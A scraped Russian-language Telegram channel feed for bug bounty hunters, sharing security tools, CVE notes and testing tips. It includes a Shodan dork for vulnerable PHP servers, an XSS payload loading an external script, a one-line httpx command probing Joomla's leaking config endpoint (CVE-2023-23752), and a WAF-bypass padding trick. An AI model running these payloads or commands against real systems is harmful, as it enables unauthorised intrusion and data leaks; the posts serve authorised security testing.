SHADOW:Group
11.6K subscribers
106 photos
47 videos
19 files
821 links
Чат: @shadow_chat_tg

Рекламу не размещаю.

Админ - @shdwpwn
Download Telegram
Forwarded from 0•Bytes•1
Я наконец то дописала большую статью про безопасность линукс на русском.
Материал для моих англоязычных читателей выйдет чуть позже

I finally wrote a long article about Linux security.
Material for my English-speaking readers will be released a little later

Приятного прочтения❤️

#vpn #linux #tor #i2p #mac #decentralization #cryptography #cve #dos #еtthernet #anonymity #attackers
👍22🔥6
📝Раскрытие исходного кода в PHP Development Server <= 7.4.21

Уязвимость позволяет узнать исходный код PHP файлов на сервере. Технический анализ и подробности читайте тут.

Поискать уязвимые хосты можно в Shodan, например, с помощью дорка:

PHP/7.4.21

Ссылка на статью
Ссылка на шаблон для Nuclei

#web #leak #dork
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥9
​​📄 Вордлисты для фаззинга от ChatGPT

@reewardius потратил время и собрал интересный вордлист с помощью OpenAI ChatGPT, словаря от Bo0om (fuzz.txt) и других багхантеров.

Выглядит интересно и свежо, так как содержит ряд уникальных, но потенциально интересных эндпоинтов. Проект жив и обещает активно дополняться и подчищаться.

Ссылка на GitHub

#web #fuzz
👍26🤯4
​​💳 Вспоминаем про уязвимости банковских приложений

Современные банковские приложения у меня всегда вызывали интерес из-за широкого функционала и наличие большого количества чувствительных данных. И тут я вижу, что на Bi.ZONE появился Тинькофф, причем с широким скоупом.

Доступны все основные сервисы экосистемы и мобильные приложения. Вознаграждение до 150 000 рублей, а если задонатить на благотворительность, то компания увеличит сумму в 5 раз.

А значит, самое время пошерстить новый функционал, который еще не был обкатан большинством багхантеров. Не лишним будет и вспомнить про уязвимости платежных систем, о которых было рассказано на канале тут и тут.

Ссылка на программу

#web
👍12🤔4
​​👨‍💻Ошибки в регулярных выражениях

Взгляните на изображение снизу. Это регулярка для сабдоменов. Символ "-" при использовании внутри класса символов, используется для определения диапазона символов. Следовательно, ".-_ " в этом регулярном выражении будет соответствовать всем символам ASCII между "." и "_". А значит пэйлоад вроде <script/src=//14.rs> также будет валидным.

Эта ошибка встречается довольно часто и может привести ко многим серьезным проблемам. Поэтому, разработчикам следует ставить "-" в конце, а специалистам по безопасности обращать внимание на подобные ошибки.

#web #xss
Please open Telegram to view this post
VIEW IN TELEGRAM
👍38
🗳Чтение произвольного файла через ImageMagick

Обнаружены уязвимости в ImageMagick, которые приводят к Dos (CVE-2022-44267) или удалённому чтению произвольного файла (CVE-2022-44268).

Пример эксплуатации последней представлен на видео снизу. Ссылка на инструмент для создания вредоносных картинок также прилагается. Полный обзор уязвимостей смотрите по ссылке.

Ссылка на PoC

#web #lfr #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥5
​​📁Тестируем формы загрузки PDF файлов

Если видите форму, в которую можно загрузить PDF, то может быть полезно использовать инструмент представленный ниже. Он позволяет сгенерировать набор PDF файлов с отстуком на Burp Collaborator или Interact.sh.

Кроме того, обратите внимание, что на некоторых эндпоинтах PDF может передаваться в base64. В таком случае достаточно найти конвертер pdf в base64 и перевести сгенерированные файлы.

Ссылка на GitHub

#web #fileupload
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥6
​​🏆Топ-10 методов веб-хакинга в 2022 году по версии PortSwigger

Традиционная номинация от Portswigger, цель которой — выявить самые значимые исследования в области веб-безопасности, опубликованные в 2022 году.

Каждая статья в списке заслуживает внимание и, если вы еще не ознакомились, то крайне рекомендую.

Ссылка на статью

#web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍22
​​🔐Нарушение контроля доступа в Joomla

В версиях с 4.0.0 по 4.2.7 обнаружена критическая уязвимость. Неправильная проверка доступа может привести к несанкционированному доступу к конечным точкам веб-сервиса (CVE-2023-23752).

PoC:

httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'

Шаблон для Nuclei

#web #leak #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
👍31🔥3
​​📝Список уязвимостей отсутствующих в Nuclei

Шаблоны CVE в официальном репозитории nuclei-templates бывают бесполезны для публичных bug bounty программ, так как большое количество людей использует эти шаблоны в поисках быстрых и простых уязвимостей.

Однако, за нас с вами потрудились и собрали список известных CVE, шаблоны для которых отсутствуют в Nuclei. Таким образом, вы можете составить собственные шаблоны, отыскать новые уязвимости и при желании поделиться с сообществом.

Ссылка на GitHub

#web #recon #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20
​​⌨️ Обход WAF через большое количество символов

Если вы столкнулись с WAF, то для POST, PUT или PATCH запросов попробуйте вставить в параметр бесполезные символы с произвольными данными, размером от 8 КБ до 10 МБ, ПЕРЕД вашей вредоносной полезной нагрузкой.

Некоторые WAF прекращают обработку после X символов полезной нагрузки, разрешая все ПОСЛЕ этого. Рандомные символы можно сгенерировать тут.

#web #waf #bypass
👍29🤔7🔥2
​​🔍Обновление GAP (GetAllParam)

Обновилось одно из моих любимых расширений для BurpSuite, под названием GAP. Это расширение позволяет находить дополнительные эндпоинты и параметры для фаззинга, анализируя запросы и ответы от сайта, а также файлы JS.

Бывает очень полезно, когда ищешь дополнительную поверхность атаки или ошибки контроля доступа, особенно при пентесте API.

Ссылка на Github

#web #recon #burp #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21🔥4
​​⚙️ Расширение Burpsuite для поиска DOM XSS

Burp-dom-scanner выполняет сканирование одностраничных приложений (SPA) на наличие DOM XSS.

Расширение также собирает все запросы (XHR, fetch, websockets и т. д.), полученные во время поиска, что позволяет пересылать их на Proxy, Repeater и Intruder Burp.

Ссылка на GitHub

#web #tools #burp
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥2
🔐Захват аккаунта через обход аутентификации SSO с помощью функции входа без пароля

Забавно, что в данном кейсе обнаружить уязвимую функцию можно было только после привязки второго пользователя, что в очередной раз напоминает нам о важности внимательного изучения всего функционала приложения.

Читать статью

#web #ato
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16🔥3
MEPhI CTF Meetup

Выложили доклады с прошедшего недавно MEPhI CTF Meetup от Bi.Zone

Малварные техники Windows в Linux
Илья Титов, младший специалист TI, BI.ZONE
Презентация

🔵ZKP: кому и зачем мы что-то доказываем
Александр Соколов, независимый исследователь
Презентация

🔵Пентест через призму ресерча
Данила Сащенко, старший специалист по тестированию на проникновение, BI.ZONE
Презентация

🔵Аутопсия бинарных CTF-тасков
Георгий Кигурадзе, CTF-игрок на пенсии
Презентация

🔵Интересные баги из жизни пентестера
Денис Погонин, старший специалист по тестированию на проникновение, BI.ZONE
Презентация

#CTF
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
⚙️ Расширение Firefox для улучшения поиска DOM XSS

Eval Villain - это расширение Firefox, которое будет перехватывать опасные функции, такие как eval, и предупреждать вас об их использовании.

Например, по ссылке можно наблюдать пример использования расширения для поиска скрытых GET параметров, с помощью перехвата URLSearchParams.get.

#web #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍24
🗳Инструмент для проверки форм загрузки файлов

Инструмент под названием upload_bypass позволяет обходить ограничения на загрузку файлов с помощью различных техник Bug Bounty.

Ссылка на GitHub

#web #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20🤯2